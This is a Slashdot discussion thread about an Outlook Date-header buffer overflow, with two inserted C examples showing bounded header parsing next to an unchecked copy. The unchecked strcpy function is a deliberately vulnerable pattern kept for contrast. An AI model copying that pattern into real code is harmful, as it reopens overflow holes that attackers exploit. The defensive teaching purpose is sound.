  114. Re:/., please... stop whining. by MousePotato · · Score: 1

    actually...if a huge security bug were found in Apache it would probably make the news just the same as this exploit did, especially considering Apache's huge inroads into the market share in the last two years. Fortunately the folks at Apache have a great product that isn't trying to cover a zillion bases at once like the MS office apps try to do.

  115. Buffer Overflow. by oh · · Score: 1
    A program which reads one line of code from the user, saves it to a fixed sized buffer, and then prints it out is vulnerable to a buffer overflow

    I'm not sure from this statement if you are saying that any program that does at least that is vulnerable, or that a program as simple as that could be vulnerable.

    You have correctly stated what a buffer overflow is, but they are preventable. If the programmer checks the size of the line before writing it to a fixed size buffer, then they can prevent a buffer overflow. It's like trying to fit a #7 peg into a #2 hole. Buffer overflows are caused by shoddy programming. I would have thought that by now developers would be aware of the problems of not checking string lengths, but these problems still turn up.

    --
    Democracy isn't about no one telling you what to do. It's about everyone telling you what to do.
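The checks the comments above ask for (refuse a Date: value that does not look like a date, assume the data is wrong in every possible way, and compare its length to the fixed buffer before copying) are sketched below as an added example; it is not code from the thread, from Microsoft, or from any mail product. The function names, the status codes, the accepted character set and the 64-byte buffer are all assumptions made for the illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DATE_BUF_SIZE 64  /* assumed limit; an ordinary RFC 822 date is about 31 bytes */

enum date_status { DATE_OK, DATE_MISSING, DATE_TOO_LONG, DATE_BAD_CHAR, DATE_FOLDED };

/* Case-insensitive match of a field name at p, never reading past avail bytes. */
static int has_prefix(const unsigned char *p, size_t avail, const char *name)
{
    size_t n = strlen(name);
    if (avail < n)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower(p[i]) != tolower((unsigned char)name[i]))
            return 0;
    return 1;
}

/* Whitelist (an assumption): only characters seen in ordinary Date: values. */
static int date_char_ok(unsigned char c)
{
    return isalnum(c) || c == ' ' || c == ',' || c == ':' ||
           c == '+' || c == '-' || c == '(' || c == ')';
}

/*
 * Find the Date: field in a raw header block and copy its value into out.
 * The input is treated as hostile: it is addressed by explicit length (it may
 * contain NULs or lack a terminator), and nothing is copied into out until
 * the length check and the character check have both passed.
 */
enum date_status extract_date(const void *raw, size_t len, char *out, size_t out_size)
{
    const unsigned char *hdr = raw;
    size_t pos = 0;

    if (out == NULL || out_size == 0)
        return DATE_TOO_LONG;
    out[0] = '\0';

    while (pos < len) {
        size_t eol = pos;
        while (eol < len && hdr[eol] != '\n')
            eol++;                              /* eol: index of '\n', or len */

        if (has_prefix(hdr + pos, eol - pos, "date:")) {
            size_t start = pos + 5, end = eol;
            while (start < end && (hdr[start] == ' ' || hdr[start] == '\t'))
                start++;
            while (end > start && (hdr[end - 1] == '\r' || hdr[end - 1] == ' '))
                end--;

            /* A folded (continued) field is refused rather than unfolded. */
            if (eol + 1 < len && (hdr[eol + 1] == ' ' || hdr[eol + 1] == '\t'))
                return DATE_FOLDED;
            if (end == start)
                return DATE_MISSING;            /* field present but empty */
            /* Length check BEFORE the copy; ">=" leaves room for the NUL. */
            if (end - start >= out_size)
                return DATE_TOO_LONG;
            for (size_t i = start; i < end; i++)
                if (!date_char_ok(hdr[i]))
                    return DATE_BAD_CHAR;

            memcpy(out, hdr + start, end - start);
            out[end - start] = '\0';
            return DATE_OK;
        }
        pos = eol + 1;
    }
    return DATE_MISSING;
}

/* Constructed sample inputs (not taken from any real message). */
static const char SAMPLE_OK[] =
    "From: a@example.test\r\nDate: Tue, 18 Jul 2000 17:57:54 -0400\r\nSubject: hi\r\n";
static const char SAMPLE_LONG[] =               /* 80-byte value, larger than the buffer */
    "Date: " "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAA"
             "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAA" "\r\n";
static const char SAMPLE_NUL[]  = "Date: Tue, 18 Jul\0 2000\r\n";   /* embedded NUL */
static const char SAMPLE_FOLD[] = "Date: Tue, 18 Jul 2000\r\n 17:57:54 -0400\r\n";

static char demo_buf[DATE_BUF_SIZE];

/* Demo helper: run the extractor against the fixed-size demo buffer. */
enum date_status demo(const void *hdr, size_t len)
{
    return extract_date(hdr, len, demo_buf, sizeof demo_buf);
}

int main(void)
{
    printf("ok=%d ", demo(SAMPLE_OK, sizeof SAMPLE_OK - 1));
    printf("value=\"%s\"\n", demo_buf);
    printf("long=%d nul=%d fold=%d\n",
           demo(SAMPLE_LONG, sizeof SAMPLE_LONG - 1),
           demo(SAMPLE_NUL, sizeof SAMPLE_NUL - 1),
           demo(SAMPLE_FOLD, sizeof SAMPLE_FOLD - 1));
    return 0;
}
```

The embedded-NUL sample is the case a `strlen`-based check would misjudge: it would see only the bytes before the NUL, while the explicit length makes the whole field visible to the validator.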
  116. Buffer Overflow idiocy by Steelforge · · Score: 1

    I am curious if they ever taught anyone in school to ALWAYS CHECK IF THE BUFFER HAS BEEN FILLED! Seriously, this is one of the most basic lessons of computer science.

  117. Re:The outlook scripting is for enterprise apps by earache · · Score: 1
    Ok, first thing:

    Outlook is not just a mail client alone. It's an entire PIM suite.

    Second thing, go ahead and whip up your little form in PHP. Now tie it into my marketing database sitting on my desktop. Oh shit you can't. Ok, let's move my database to the server. SQL migration script has been written? Oh shit no it hasn't.

    Third thing, go ahead and whip up a little php form that inserts calendar items, to do items, journal entries in my Outlook? Oh wait you can't ... damn ...

    The point, of course, is that comparing outlook and asp/php/jsp stuff really isn't appropriate in an enterprise situation where Marketing Manager Mark wants other people in his company to update stuff sitting on his desktop or in his outlook setup.

    WHICH, AGAIN, IS WHY OUTLOOK HAS SCRIPTING.

  118. Re:Wow..... by jafac · · Score: 2

    You have discovered the secret, grasshopper.

    I have worked in software companies for 8 years, and I can tell you bar none, that 90% of quality problems are caused by a marketing-driven schedule and feature set.

    Yes, it's unavoidable that software has to sell to finance its own development, and selling on a schedule is a requirement of marketing. You line up magazine reviews and trade shows months in advance, if the software doesn't ship on time, you miss this window, you end up losing a huge potential in sales - because of lack of hype. I've seen damn good products die on the vine due to missing the window; and I've also seen instances where the sales force of a large software company will only sell the best selling (largest bonus, easiest to sell) product, and ignore the rest, causing other products the company sells or introduces to die, all because nobody will stand up to the sales director and tell him to tell his people to get their asses in gear.

    Other factors have been the easy ability for software companies to ship with massive defects to match a schedule, and put a patch on the web for downloads later - this was not nearly as common back when customers had to dial into a BBS for a patch (before widespread use of the web).

    Basically, it's more of a competitive advantage to get a market presence (we're talking vapor here), than it is to ship a good stable product.

    Who to blame?

    The trade press. Whether the reviews are accurate or not, they still sell their rags. My company has a whole department of people whose job it is to "manage trade press relationships", that is, to make sure they get a favorable review. If we had a serious bug during an evaluation, our people fly out there and pucker up to the journalists, and no mention is made of the bug in the review.

    This is life, in the software industry folks. It's only gotten worse.
    And it will only get still worse.


    if it ain't broke, then fix it 'till it is!

    --

    These are my friends, See how they glisten. See this one shine, how he smiles in the light.
  119. Re:Bugtraq by PDHoss · · Score: 1

    People are still using IE 3.0! Users generally too lazy to upgrade software, even if there's a known security issue

    Unfortunately, MS has the tendency to make service packs/patches into "feature upgrades," meaning it fixes the bug and throws in some new (potentially plagued) stuff to boot. Just look at how few people have installed SP6... if it was only fixes for known issues, what's holding people back?

    PDHoss


    ======================================
    --
    ======================================
    Writers get in shape by pumping irony.
  120. Hands up all who are surprised by this! by Flounder · · Score: 1

    .....

    didn't think so.

    --

    No boom today. Boom tomorrow. There's always a boom tomorrow. - Cmdr. Susan Ivanova

  121. Anyone notice this one? by Danse · · Score: 4

    This may be slightly OT, but this seems like the best place to post it since I doubt it would get a story of its own. Got this from the SANS Institute. Apparently another problem involving IE 4+ and Access 97 or 2K on just about every Windows platform. Don't think I've seen this one posted here. You can read about it here.

    --
    It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer
  122. Re:nothing to do with flexibility by cyber-vandal · · Score: 1

    Exactly, which is one of the many reasons why the MS monopoly is a bad thing.

  123. How long can they keep this up? by chowda · · Score: 1

    In just a few months we've seen several MASSIVE security holes in microsoft products.. how long will managers risk their companies by continuing to use these products? how long can microsoft keep saying "oops"? I'm rather surprised they aren't charging for these fixes.

    --

    YouTube & Google Video -> podcast http://castcluster.blogspot.com/
    1. Re:How long can they keep this up? by Ian-K · · Score: 1

      Ahem, what?!?

      You gotta be kidding mate. Are you even vaguely aware of the time it takes a patch to be released for an open-source program, compared to a closed source one? Where the former takes a few hours typically, the latter can be expected in a few weeks at the earliest.

      This is the first time I hear M$ will be releasing a patch that soon and it's an incredibly short time for their practices. Definitely a first for them.

      Trian

      --
      I'm no longer fed up with MS Windows: I got rid of them :)
    2. Re:How long can they keep this up? by neb · · Score: 1

      I agree completely. How long can the insanity last? When will the management attitude change from "I can't get fired for using Micro$oft" to "I'll get fired if i use Micro$oft"?

    3. Re:How long can they keep this up? by CptLogic · · Score: 1

      It doesn't matter anyway, now that Microshaft are planning to stop you buying their software. You will only be able to rent it. Of course, when you rent a house you are entitled to a certain standard of housing and the landlord is culpable if any of the heating/washing machine/other specified amenities go wrong.

      Essentially, if I rent a house that is in the contract as saying "With washing machine, toilet and central heating" then all of those things are the landlord's responsibility to keep running for me to a useable standard.

      Unfortunately I doubt that Microshaft will pay for the fixing and damage caused by their software not living up to its claims. And it'll be because you clicked on the "Yes I Agree" button without reading the EULA that says "You hereby give up your basic human rights." But illegal contracts are another issue altogether that I don't want to rant about here.

      ObSecurity: Hell of a lot of security issues with Open Source s/w on VULN-DEV recently. I note that the responses from Open Source authors are a lot quicker than from big companies. I guess this is because they don't have to worry about profits dropping if the news gets out.

      Chris.

  124. moderate this up by GodSpiral · · Score: 1

    moderate this up

  125. Re:$500 reward by cyber-vandal · · Score: 1

    How about one that fires up a message 'This virus was brought to you by a Microsoft security bug (tm)' 20 times. Perhaps then people would get the point.

  126. Sample Code by oniisan · · Score: 1

    Does anyone have an example of this exploit?

    1. Re:Sample Code by friscolr · · Score: 1
      there's also an article on Security Focus about this - http://www.securityfocus.com/news/61 - and yesterday there were some interesting posts about this, including one with a partially flawed exploit script. go to Forums-> mailing lists-> bugtraq to see the posts in question.


      -f

  127. Strange quote... by Gabey · · Score: 1

    "The only defense against the vulnerability is installing the Microsoft patch, which will be available shortly on the Microsoft.com security Web site."

    I love it...they just automatically assume everyone in the world must use Outlook...

    In case anyone's curious, I strongly recommend Kaufman Mail Warrior (http://pages.infinit.net/kaufman/Index.htm)

    Handles multiple accounts with ease, nice interface, no viruses to worry about, and tiny (relatively)...one 700k executable or something...

    Just felt like spreading the word :)

    -Gabe

  128. I meant the one above me, not parent by GodSpiral · · Score: 1

    not much text in here

  129. Fix is already out...almost by thechink · · Score: 1

    It's available here.

  130. look... its a buffer overflow bug... by EnderWiggnz · · Score: 2
    not a crappy script kiddy hack...

    these things are really really really difficult to find... I mean... how many of your QA people will sit around and write low-level code to include in every possible field to test for buffer overflows...

    I don't know of any where I work that are capable of even thinking about that... granted MS may have the best minds for it, but really, truthfully...

    BUFFER OVERFLOW EXPLOITS HAPPEN...

    now ... they should have fixed it sooner... hell... they had it since JUNE 8th...

    --
    ... hi bingo ...
  131. IE 5.5 by londenberg · · Score: 1

    I saw the advisory on NTBugTraq and the fix, the default install of either IE 5.01 or IE 5.5. So I got the latest and ... well the latest anyways. IE 5.5 munched my computer and it has so far taken about 2.5hrs and a half dozen reboots to get functional again. Microsoft sucks, I wish I didn't have to use it here at work!

    1. Re:IE 5.5 by sredding · · Score: 1

      Hmmm... my install went flawlessly. YMMV, I guess.

  132. haven't "played with Win2k" yet... by SethJohnson · · Score: 1


    ...since I haven't played with Win2k as yet....

    How about:

    ...since I haven't stepped in Win2k as yet...



    Seth
  133. Re:C / C++ etc. by zorgon · · Score: 3
    Bring back pascal! What this country needs is strong type checking and a good national buffer defense! Vote for me in the next e-lection and I promise new F(nord)ederal regulations to require bounds checking for arrays and strings in all alpha, beta, and gold releases of all new compilers and interpreters. These evil buffer overflows must be stopped! Thank you, thank you very much.

    WWJD -- What Would Jimi Do?

    --

    I am quite civilized, and I should be brought a beer immediately. -- Bruce Sterling

  134. Re:Bugtraq by NetCurl · · Score: 1

    Thank you for your computer science lesson, but I was not directly commenting on the buffer overflow exploit. What I was trying to do was draw a parallel between this exploit, and the fact that in the same week, Microsoft has achieved "the worst exploit in their OS ever." My point is, there is an underlying problem. It's not just one thing, it's the philosophy and way that Microsoft is "innovating" that is the problem. Look at their track record this week alone. Two HUGE exploits that can execute almost completely independent of any user control.

    --

    It's only when we've lost everything, that we are free to do anything...

  135. Wouldn't the attack need to come from mail server? by zeppelin71 · · Score: 1
    Can someone clarify for me whether or not, once the buffer overflow had been exploited, wouldn't the attack need to continue from the user's mail server? Also - I'm assuming the user's Outlook would crash and they'd restart... closing the open port.

    Right, wrong? I'd be interested to know more. Thanks

  136. Re:Wow..... by GodSpiral · · Score: 1

    Common...

    although this bug has a huge impact, i wouldn't call OE's developers or QA team incompetent over it.

  137. Did anyone notice this... by spankenstein · · Score: 1

    I thought this part of the story on CNN was really funny.

    Corporate users aren't affected by the security hole. But home users, running Microsoft's Outlook or Outlook Express e-mail programs, are at risk.

    Do no corporations use Outlook???

  138. Re:Security certification needed? by jafac · · Score: 1

    You'd think that a company like Consumer's Union would be doing this.

    Then again, I guess Ralph Nader is too busy running for president these days.

    if it ain't broke, then fix it 'till it is!

    --

    These are my friends, See how they glisten. See this one shine, how he smiles in the light.
  139. How the MORONS at M$ could have avoided this by muldrake · · Score: 1

    The stupid shitheads could have tried reading RFC 821 and used standard techniques of mail handling that have been around since fucking 1982.

    Then there would be no Melissa, no Love Bug and none of this other crap based on pathetic software that can't even handle a Date field. The pitiful MSNBC article was worthless, and apparently this is some kind of buffer overrun error. Can't they even avoid that shit, or have it actually CRASH when it hits an error it can't handle? This is one occasion where a BSOD would be preferable to what this idiotic software allows.

    Yeah, I know, standard boilerplate Microshaft sucks rant.

  140. Old Version of Notes by zookie · · Score: 1
    Wow, I didn't think I'd catch someone on /. defending MS's user interface.

    To be fair, the referenced site deals with Notes 4.6. Notes 5.0, which came out over a year ago, completely changed the UI. I haven't gotten a chance to play with it, so I can't say if the UI is better or worse -- just that it's different.

  141. Re:*yawn* more microsoft bashing by muldrake · · Score: 1

    I would like to see the linux community make a better email program then outlook.

    Fucking /bin/mail is a better email program than outlook. Reading it out of /usr/spool with cat is a better email program than outlook.

    Anyway, elm rules. All three methods I list are better than outlook, because they actually work and don't infect your computer with viruses.

  142. My favorite line in the article by monaco · · Score: 3
    MSNBC.com learned of the flaw June 11, but agreed not to publish the information until Microsoft had a chance to supply a fix. That's standard practice in the computer security business in order to prevent possible harm to computer users.

    *rolls eyes* Do I even need to elaborate?

    1. Re:My favorite line in the article by Anonymous Coward · · Score: 1
      Don't they have some kind of internal Q&A department to try to penetrate their products!?

      BAHAHHAHAHAHAHAHHAHAHAHA!!!!!!! WAAAAAAAAAAAHAHAHAHHAHAHAH!!!!! HOOHOOOO!!!!!! WAAAAHAHHAHAHAHAHHA!!!!!!!

      Whew! Thanks, that was a good one.

    2. Re:My favorite line in the article by Robert+Link · · Score: 1
      Yes, actually, I believe you do need to elaborate. As far as I can tell the article's statement is accurate. In fact, I seem to recall a post on BUGTRAQ a week or two ago admonishing people to contact vendors privately and give them ten days or so to work up a patch before publishing a vulnerability. What is your beef with that?


      -rpl

    3. Re:My favorite line in the article by pen · · Score: 1
      According to a post on Bugtraq, Microsoft was notified on July 6th, but a patch was not released until the vulnerability was posted on Bugtraq.

      --

  143. Its Time For Eudora by quakeaddict · · Score: 1

    I am not a MS hater by any stretch, but after I read this yesterday I downloaded and installed Eudora on my wife's pc last night.

    Outlook, while a great e-mail client, is not something I will ever hook directly up to an internet account ever again.

    I think, when it comes to Outlook, in the flexibility vs. security decision, MS has weighted too much towards flexibility.

    --
    I'm still working on a clever footer.
  144. Windows Millennium by citizenc · · Score: 1

    Microsoft's latest version of Windows, Windows Millennium Edition, includes IE5.5 final. I know this because they sent me a complimentary copy for beta testing. (Heh.. doesn't seem very Microsoft to me.. a company that charges for patches (Win98 -> Win98SE = $130) gave me a copy of their newest OS? *Shrug*)

  145. Buffer Overflow by jjr · · Score: 1

    How long would it take some one to figure out to exploit this one? I guess you should use eudora or Netscape for awhile.

    1. Re:Buffer Overflow by |0|4 · · Score: 1

      There's already exploit code out there. Links to it were provided in the USSR Labs' advisory, which appeared on NTBugTraq this morning.
      Their advisory can be found in the NTBugTraq archives, here.

      --
      reverend lola
      the titanium sheep
      provider of steel wool
  146. There are alternatives by meadowsp · · Score: 1

    Good luck to you if you do start your own slashdot, but don't get too disillusioned. There are already alternatives out there, Kuro5hin, Advogato, Technocrat and even Nanodot. The quality of Slashdot really does seem to be going downhill recently. The only thing that keeps me here is that there still are a few interesting things. Bahh humbug, it was all much better in my day....

  147. Re:The outlook scripting is for enterprise apps by rhavyn · · Score: 1

    Then why is it enabled by default? It seems to me that if [insert big enterprise here] wanted scripting, their IT departments could turn it on.

  148. Re:THE EXPLOIT IS HERE! by CoolVibe · · Score: 1

    Crash outlook and spawn a browser with USSR lab's page loaded in it. You can change that easily btw :) (no, i'm not gonna tell how. figger it out yerself)

  149. Re:VIRUSES, not virii idiot by Ian-K · · Score: 1

    Well,

    as far as I recall, "virii" is the Latin and "viruses" is the modern English. So, he's not really at fault. Just a bit more linguistically educated than you.

    Trian

    --
    I'm no longer fed up with MS Windows: I go rid of them :)
  150. Neither macro nor virus... by |0|4 · · Score: 5

    ...it's a buffer overflow.

    Outlook doesn't check the length of one of the date fields - a long string of data in that field will overflow a buffer. Once this has occurred, arbitrary code can be executed.

    The fix is to install IE 5.01 SP1 on any affected Windows platform. Or you can install IE 5.5 - but not on Win2K.

    More information is available in the posts to BugTraq and NTBugTraq, which is where I got the above information.

    --
    reverend lola
    the titanium sheep
    provider of steel wool
    1. Re:Neither macro nor virus... by micahjd · · Score: 1
      At times (like installing the new nVidia drivers) i think that the efforts to 'standardize' linux would be beneficial.

      But, this is one area that linux really shines in... In windows, the DLL is guaranteed to be the same on all systems, so they all crash. Different linux distros and versions will have different binaries. A single buffer overflow exploit won't work on all of them.

      I guess it's sort of like diversity in the gene pool preventing massive plagues.

      --
      -- 2 + 2 = 5, for very large values of 2
  151. There is a reason Lotus is losing by tilly · · Score: 3

    The interface.

    Need I say more?

    Cheers,
    Ben

    --
    My usual seat in the cluetrain is at http://pub4.ezboard.com/biwethey.ht
  152. Not really by Carnage4Life · · Score: 4

    The email is stored on a server, your mail client retrieves it and then parses it before storing it in your inbox. According to the MSFT security release, Outlook doesn't check that all the fields are the correct size while parsing it...thus buffer overflow.

    I thought by now, we'd be rid of buffer overflow bugs.
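
The unchecked field copy that comments 150 and 152 describe, next to a bounded version, as an added example that is not part of any comment and is not Microsoft's code. `DATE_FIELD_MAX`, the function names and the sample messages are assumptions constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DATE_FIELD_MAX 64 /* assumed capacity; a well-formed RFC 822 date is about 31 bytes */

enum { HDR_OK = 0, HDR_MISSING = -1, HDR_TOO_LONG = -2 };

/* The unchecked pattern, for contrast only: the number of bytes written is
 * chosen by whoever sent the message, not by the size of dst. */
void copy_field_unchecked(char *dst, const char *value) {
    strcpy(dst, value);
}

/* Case-insensitive test for "<name>:" at the start of a header line. */
static int is_header(const char *line, size_t len, const char *name) {
    size_t n = strlen(name);
    if (len <= n || line[n] != ':') return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i])) return 0;
    return 1;
}

/* End offset (CR/LF excluded) of the line at pos; *next gets the next line's offset. */
static size_t line_end(const char *msg, size_t len, size_t pos, size_t *next) {
    size_t eol = pos;
    while (eol < len && msg[eol] != '\n') eol++;
    *next = eol < len ? eol + 1 : len;
    if (eol > pos && msg[eol - 1] == '\r') eol--;
    return eol;
}

/* Bounded append: refuses, rather than truncating or overflowing, when the
 * bytes plus the terminating NUL would not fit. */
static int append(char *dst, size_t cap, size_t *used, const char *src, size_t n) {
    if (n >= cap - *used) return HDR_TOO_LONG;
    memcpy(dst + *used, src, n);
    *used += n;
    dst[*used] = '\0';
    return HDR_OK;
}

/* Extract one header value from the header section of a raw message,
 * unfolding continuation lines (those starting with space or tab). */
int extract_header(const char *msg, size_t len, const char *name, char *dst, size_t cap) {
    size_t pos = 0, next = 0, used = 0;
    if (cap == 0) return HDR_TOO_LONG;
    dst[0] = '\0';
    while (pos < len) {
        size_t eol = line_end(msg, len, pos, &next);
        if (eol == pos) break; /* blank line: the headers are over */
        if (is_header(msg + pos, eol - pos, name)) {
            size_t v = pos + strlen(name) + 1;
            for (;;) {
                while (v < eol && (msg[v] == ' ' || msg[v] == '\t')) v++;
                if (append(dst, cap, &used, msg + v, eol - v) != HDR_OK) goto too_long;
                if (next >= len || (msg[next] != ' ' && msg[next] != '\t')) return HDR_OK;
                if (append(dst, cap, &used, " ", 1) != HDR_OK) goto too_long;
                v = next;
                eol = line_end(msg, len, v, &next);
            }
        }
        pos = next;
    }
    return HDR_MISSING;
too_long:
    dst[0] = '\0'; /* never pass a partial value on to later parsing */
    return HDR_TOO_LONG;
}

/* Wrappers that parse the Date header into a DATE_FIELD_MAX-byte buffer. */
int date_status(const char *msg) {
    char date[DATE_FIELD_MAX];
    return extract_header(msg, strlen(msg), "Date", date, sizeof date);
}

const char *date_of(const char *msg) {
    static char date[DATE_FIELD_MAX];
    return extract_header(msg, strlen(msg), "Date", date, sizeof date) == HDR_OK ? date : NULL;
}

/* Constructed sample: a message whose Date value is `fill` filler bytes. */
const char *oversized_sample(size_t fill) {
    static char msg[1024];
    if (fill > sizeof msg - 64) fill = sizeof msg - 64;
    size_t n = (size_t)snprintf(msg, sizeof msg, "From: a@example.test\r\nDate: ");
    memset(msg + n, 'x', fill);
    snprintf(msg + n + fill, sizeof msg - n - fill, "\r\nSubject: hi\r\n\r\nbody\r\n");
    return msg;
}

int main(void) {
    const char *ok = "From: a@example.test\r\nDate: Tue, 18 Jul 2000 10:15:00 -0700\r\n\r\nhi\r\n";
    printf("normal:    %d (%s)\n", date_status(ok), date_of(ok));
    printf("63 bytes:  %d\n", date_status(oversized_sample(63)));
    printf("300 bytes: %d\n", date_status(oversized_sample(300)));
    return 0;
}
```

The bounded version rejects an over-long field outright instead of truncating it, so a delivery-level filter built on it can quarantine the message rather than pass a mangled header on to the client.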

  153. Unfortunately there's a fundamental disconnect.. by ry4an · · Score: 3

    Unfortunately there's a fundamental disconnect in the corporate world between the security conscious admins and management. Management wants things easy and standardized, and (for the most part) admins want things secure. These exploits can crop up every week and it won't do a thing to convince management that outlook is a bad choice.

    Admins will continue to throw in layer after layer of mail pre-filtering software at the delivery level, when they should really just be able to get a secure MUA on their users' desktops.
    --

  154. Finally a "cluefull" Outlook exploit by Pac · · Score: 4

    I don't know about the rest of you, but I was rather tired of hearing the mass-media crying bloody murder against one or another teenager that happened to set free the newest and lamest VBA macro-virus.

    At least this time it is a real bug, not a feature, and it has Microsoft working overnight to correct it. Those who remember the glorious days of early sendmail versions know that we've already been there, done that.

  155. ?us? and them by BlueUnderwear · · Score: 1

    ROTFL... While you may have a point (Unix had had its fair share of buffer overruns too...), you somewhat blew your credibility by your faux "educated Linux user who admits that MS is not all bad" attitude.

    --
    Say no to software patents.
    1. Re:?us? and them by kiscica · · Score: 1

      Ah, I see now.

      Actually, you should read those question marks (which, of course, showed up as quotes on the machine I was posting from) as evidence that I rarely use a Windows machine at all: otherwise I'd be aware of that pitfall. (Also I happened to be posting that from a machine with a Hungarian keymap).

      No, I certainly was not trying to "impersonate" anyone. Being a "Linux proponent," moderate or otherwise, is not really an important part of my life -- I don't spend all that much time proselytizing -- but I spend 8-10 hours a day working under Linux right now, and have spent a large part of the past 17 years of my life working under Unix systems, so I certainly feel comfortable in using that inclusive "us."

      kiscica

  156. Doesn't appear that serious... by ronny-da-hill · · Score: 1

    I use OE and have never got any viruses - maybe I just have a better class of friends! Just a thought...

    --
    Microsoft - not all bad.
  157. Surely other email clients are vulnerable too? by daveewart · · Score: 1

    This vulnerability occurs when messages are downloaded via POP3 (or IMAP) and a buffer overflow in the Date header occurs. Every email client capable of downloading mail in this way is potentially at risk ... Well-coded clients will perform correct bounds-checking and not be affected, but surely MS Outlook is not the only one that fails to check?

    Of course, exploiting the vulnerability may not be very easy, but the vulnerability could still be there ...

    --
    "If you think the problem is bad now, just wait until we've solved it." --- Arthur Kasspe
  158. VM should handle this by slashdot-me · · Score: 2

    You'd think the virtual memory system could just deny execute access to memory alloc'ed by C. I gave it a try using VirtualAlloc with PAGE_READWRITE (not execute permission). Windows still exec'd the code. Maybe a kernel hacker could tell me if this is a limitation of the intel VM or another one of Bill's stupid mistakes.

    Ryan

  159. Techweb says Eudora is by mirko · · Score: 1

    Techweb's article says that any mailer using MSIE(4+) HTML renderer is vulnerable...
    --

    --
    Trolling using another account since 2005.
  160. Can http be vulnerable too? by marat · · Score: 1
    1. They said problem is in code shared with IE.
    2. HTTP got headers too.


    Every secretary using MSWord wastes enough resources
  161. HAHA, Figures. by linuxgod · · Score: 1

    It figures, Microsoft can't really make a decent product much less make it secure. I can only imagine how many buffer overflows you will see when M$ releases their source. GO DOJ !!!!!

  162. Re:Swiss cheezzz by Rumble · · Score: 1

    and your sig isn't from Platoon, it's from Full Metal Jacket.

  163. Re:Just publishing a patch isn't going to fix this by shippo · · Score: 1
    IE 4 and 5 do come with a semi-automated update mechanism that will check to see which patches need installing, fetch them from MS and tell you to reboot if needed (MS systems can't overwrite a currently running DLL or EXE file). This is accessible from a menu option within Internet Explorer.

    I have to run MS at work, and I check this site every day. I also check the standard Microsoft Technet security pages at regular intervals.

    At home I run a home-brew Linux system. Again I check with the relevant sites to see which software to upgrade, then download it and compile. I am starting to get paranoid, so I will be switching to Debian, and use apt-get (or whatever it's called) to keep me as up to date as possible. I also regularly run the current Nessus against my home system to ensure that it is not susceptible to known exploits. Nessus itself has a mechanism to automatically update all scripts.

    Past experience has shown that a lot of sites are clueless when it comes to security. I know of one company that is still using IE3 on every desktop. I don't want to know what's running on their servers!

  164. Re:Bugtraq by shippo · · Score: 1
    Domino is probably the slowest webserver on the market. It has to do so much to render HTML out of a .NSF file.

    As for security, Lotus do produce quarterly updates, and these do contain fixes to security problems. Some seem to be DoS problems with Domino itself.

  165. Moderator points by WowTIP · · Score: 1

    I wish I had some mod points right now, not for your comment, but for your .sig. Hehe

    --

    "I'm surfin the dead zone
    In the twilight, unknown"
    1. Re:Moderator points by bakreule · · Score: 1

      (nod) Thank you. :-)

      --

      Buses stop at a bus station
      Trains stop at a train station
      On my desk there's a workstation....

  166. Re:outlook just cant be fixed by 1010011010 · · Score: 2

    And people do.. read the Unix Hater's Handbook.

    ---- ----

    --
    Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
  167. Re:More Microsoft Bashing.. how sad by PenguiN42 · · Score: 1

    someone didn't read the whole thing, or has no sense of humor. This guy was being facetious people!!!

    --
    The following sentence is true. The preceding sentence was false.
  168. /., please... stop whining. by Otis_INF · · Score: 2
    OK, MS should kick out all the office/outlook express developers and hire new ones. But... why do I have to read about an exploit in a MS product on the main page, while there are zillion other exploits in other programs as well but these are NOT mentioned on the front page? I can understand you all can drink Bill Gates' blood for breakfast but please, keep the news informative. If people want to read rants about MS bugs they'll visit zdnet or bugtraq. I don't see why this is nerd/geek or crap that matters' related. It's pure ranting and raving. And after all these years, you still don't understand that whining about the lack of good programming on 'the enemies (enemy? like in a war?) side', doesn't help your own good, it doesn't make your own side's code better.

    (the only purpose for this non-informative crapnews I can think of is: it must be a hint for a new conversation at the coffeemachine, when that nice blond from Marketing is at the coffeemachine at the same time as you do :)).


    --
    Never underestimate the relief of true separation of Religion and State.
    1. Re:/., please... stop whining. by sien · · Score: 1

      It matters because of the huge market share they have. Simple. Mind you, you do have a point, if a huge bug in Apache appeared would it make MSNBC?

  169. Not just an email client bug! by shad0i · · Score: 1
    This is not simply an email client bug, this is an excerpt from Aaron Drew's initial leak of the bug to BUGTRAQ:

    The bug lies in the shared library INETCOMM.DLL and has been successfully exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.

    It has been confirmed that other applications (such as PGP) are vulnerable as well.

    --shadoi
    "Security == Controlled paranoia."

  170. Re:nothing to do with flexibility by WowTIP · · Score: 1

    Hmmm...

    You pretty much described why I use eudora. Because 95% of the world is not using it, it doesn't get the same attention from evil haxxors...

    And it's a pretty good client too.

    --

    "I'm surfin the dead zone
    In the twilight, unknown"
  171. No Win2K Fix by Acy+James+Stapp · · Score: 1

    The great part is that it is impossible for them to fix this in Win2K without issuing a service pack because of the system files protection. Man, microsoft really rocks.

    --
    -- Too lazy to get a lower UID.
    1. Re:No Win2K Fix by thechink · · Score: 1

      Upgrading to IE 5.01 SP1 will fix the problem on ALL versions of Windows. Upgrading to IE 5.5 however doesn't fix it on W2K. At least so says Microsoft.

  172. Wow..... by JordoCrouse · · Score: 2

    I will never again bad mouth my Netscape 4.72 IMAP client.

    -- pause whilst I hug my browser --

    So all Microsoft bashing aside, how do things like this get out the door? To me, it almost seems that they are purposely not doing any sort of testing at all. I know about the jokes that say they get free testing by releasing their alphas, but seriously! So many people around the world depend on their software, you would think that they would put it through hell and back, but products continually come out of Redmond with serious, serious flaws.

    I mean, how long did it take someone to find a hole in IE 5.5? Like 3 days???
    Putting aside all the jokes and the "evil empire" comments and everything that the /. community feels about Microsoft, don't you think that a company of that size (and with their software controlling so many critical sites around the globe) has a responsibility to go overboard on quality assurance? We should be hearing horror stories from ex-employees about 48 hour testing binges and slave driver QA directors. That would make me much more comfortable than the consistent major flaws that keep appearing.

    --
    Do you have Linux and a DotPal? Click here now!
  173. Re:The outlook scripting is for enterprise apps by CoolVibe · · Score: 1

